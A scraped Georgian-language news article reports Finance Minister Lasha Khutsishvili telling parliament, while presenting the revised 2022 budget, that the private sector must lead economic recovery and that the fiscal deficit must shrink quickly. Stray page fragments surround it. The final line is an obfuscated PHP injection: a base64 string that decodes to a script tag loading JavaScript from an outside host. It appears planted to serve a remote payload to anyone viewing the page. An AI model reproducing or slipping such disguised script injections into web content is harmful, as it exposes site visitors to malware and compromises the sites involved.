celsiusi
ავერსი საქკაბელი
ეკონომიკამ აღდგენა უკვე დაიწყო და ამ აღდგენის მთავარი წარმმართველი კერძო სექტორი უნდა იყოს - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა პარლამენტში, 2022 წლის ბიუჯეტის პროექტის გადამუშავებული ვერსიის წარდგენისას.
 
მისი განცხადებით, გლობალური ლოქდაუნის ფონზე, კერძო სექტორისათვის პანდემიის შედეგების თავიდან აცილება შეუძლებელი იყო და სახელმწიფოს ჩარევის გარეშე ზიანი შესაძლოა იმდენად დიდი ყოფილიყო, რომ ეკონომიკური აღდგენა არათუ მიმდინარე წელს, არამედ 4-5 წლიან პერიოდშიც შეუძლებელი ყოფილიყო.
 
„ფისკალური პოლიტიკაც მიმართული იყო პანდემიის სოციალური და ეკონომიკური შედეგების შემამსუბუქებელი ღონისძიებების გატარებაზე, რაც საბოლოოდ გაზრდილ ფისკალურ დეფიციტსა და შესაბამისად გაზრდილ ვალში აისახა. ჩვენი ეკონომიკური პოლიტიკა, ყოველთვის კერძო სექტორს მოიაზრებდა ეკონომიკური ზრდის მთავარ მამოძრავებლად და მან ეს როლი უნდა დაიბრუნოს. ეკონომიკის აღდგენის ეტაპზე ჩვენი ვალდებულებაა განვითარებისთვის სათანადო პირობები შევუქმნათ კერძო სექტორს“, - განაცხადა ლაშა ხუციშვილმა.
 
მისივე თქმით, აუცილებელია, მაკროეკონომიკური სტაბილურობის აღდგენა, რაც პირველ რიგში ფისკალურ კონსოლიდაციას გულისხმობს.
 
ლაშა ხუციშვილის განცხადებით, მაქსიმალურად სწრაფად უნდა შემცირდეს ფისკალური დეფიციტი, იმისათვის, რომ არ შეიზღუდოს კერძო სექტორის განვითარების პოტენციალი და ასევე, უნდა გატარდეს ბიზნესგარემოს გაუმჯობესებაზე ორიენტირებული რეფორმები.
1046
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");